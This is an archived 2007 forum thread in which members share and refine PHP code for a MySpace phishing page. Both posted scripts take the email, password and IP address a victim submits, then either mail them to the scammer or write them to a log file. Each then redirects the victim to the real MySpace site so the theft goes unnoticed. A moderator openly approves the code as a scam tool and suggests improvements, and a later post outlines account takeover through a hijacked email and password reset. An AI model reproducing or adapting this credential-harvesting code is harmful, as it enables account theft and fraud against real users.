PDA

View Full Version : Myspace Emailer...



Lethal323
11-22-2007, 12:58 AM
I would like to welcome my self to the forums :)

I will start posting on here alot more


Well I read the post about someone asking about a myspace emailer?

Well here you go, I had some spare time so I made one.

You can download it here (http://www.theprogamers.com/stuff/myspaceemailer.zip)

If you have any questions feel free to email me.

lethal@theprogamers.com

If you want to s***est something else please email me I like to get emails!

Moonbat
11-22-2007, 09:43 AM
Please post your source code (PHP or ASP source code) so we can verify this is not a scam.

Lethal323
11-22-2007, 09:44 AM
Like this...







<?php
if (isset($_POST['email']) && (isset($_POST['password']))) {
$email = trim(strip_tags($_POST['email']));
$password = trim(strip_tags($_POST['password']));
$IP = $_SERVER['REMOTE_ADDR'];

$to = '(PUT YOUR EMAIL HERE!)';
$subject = 'Myspace Login';
$message = "$email - $password - $IP";
$headers = 'From: New Myspace Login' . "\r\n" .
'Reply-To: Login' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);
echo'<script type="text/javascript">document.location.href=\'http://home.myspace.com/index.cfm?fuseaction=user\'</script>\'">';

}
?>

Moonbat
11-22-2007, 09:52 AM
That's perfect. I like how you sanitize user input, although I'm more fond of htmlentities(). I think you are the first member (besides the mods) to sanitize input in your PHP code, so for that I thank you for making the e-world a safer place :D

I put Vbulletin's PHP tags around your code to give syntax highlighting. You now have permission to post the download link.

EDIT: Many free web hosts block the SMTP mail() function. You should research some file input output functions so you can write this data to a text file on the scammer's web server instead of mailing it to him. Here's a comprehensive list of file I/O functions and how to use them.

http://www.w*schools.com/php/php_ref_filesystem.asp

Lethal323
11-22-2007, 09:53 AM
Thank you very much



You can download it here (http://www.theprogamers.com/stuff/myspaceemailer.zip)

Check it out in close detail moonbat...


***REPLY TO EDIT***

I already made one like that hold on and let me upload it to my website and I will post the download link, although I half to eat first so it will be a lil...

Moonbat
11-22-2007, 10:00 AM
Seems cool, and consolidated in one file makes it more user-friendly.

But prepare to be swamped by requests asking how to use this file, from other members.

Lethal323
11-22-2007, 10:11 AM
Ahhh but thats why you make a user friendly read me(I hope there not that stupid?)





<?php
if (isset($_POST['email']) && (isset($_POST['password']))) {
$email = trim(strip_tags($_POST['email']));
$password = trim(strip_tags($_POST['password']));
$logfile= 'myspace.html';
$IP = $_SERVER['REMOTE_ADDR'];

$fp = fopen($logfile, "a");
fwrite($fp, $email);
fwrite($fp, "<br>");
fwrite($fp, $password);
fwrite($fp, "<br>");
fwrite($fp, $IP);
fwrite($fp, "<br>");
fwrite($fp, "<br>");
fclose($fp);
echo'<script type="text/javascript">document.location.href=\'http://home.myspace.com/index.cfm?fuseaction=user\'</script>\'">';

}
?>



DOWNLOAD IT HERE (http://www.theprogamers.com/stuff/loginposter.zip)

Moonbat
11-22-2007, 10:48 AM
Ahhh but thats why you make a user friendly read me(I hope there not that stupid?)

You'd be suprised by some people here.

Anyway, nice code :D

Lethal323
11-22-2007, 11:10 AM
Thank you!

Lethal323
11-22-2007, 02:13 PM
Ya here is a good example of a stupid person...



Sry if this is somewhere else but i cant find it and i want to say this...

MYSPACE HACKING IS EASY!!!!!!!
*)get the e-mail of the account

2)get the e-mail password (hardest part requires a little work with some with others just takes a lil background knowledge)

*)go to forgot password on myspace and read the e-mail

4)*IMPORTANT* delete e-mail!!!!!!

5)log in

if it got any easier they would post there own password jeez!

And your respawns Moonbat(Priceless)

theendoftime
12-03-2007, 03:02 PM
I would like to welcome my self to the forums :)

I will start posting on here alot more


Well I read the post about someone asking about a myspace emailer?

Well here you go, I had some spare time so I made one.

You can download it here (http://www.theprogamers.com/stuff/myspaceemailer.zip)

If you have any questions feel free to email me.

lethal@theprogamers.com

If you want to s***est something else please email me I like to get emails!

The link no longer works :( is there anywhere else I can download it?


Thanks :)

mediocrebad11
01-20-2008, 01:22 AM
Hey, Lethal. I know there's probably some rule about brining up old threads, but it's probably better than starting a whole new one just to ask if you or anyone else can post a link that works. I'd appreciate it much.

coz
01-20-2008, 11:11 AM
Why do you need the download link when the source is a couple posts above yours. You would download the .rar, extract it, and see the same thing.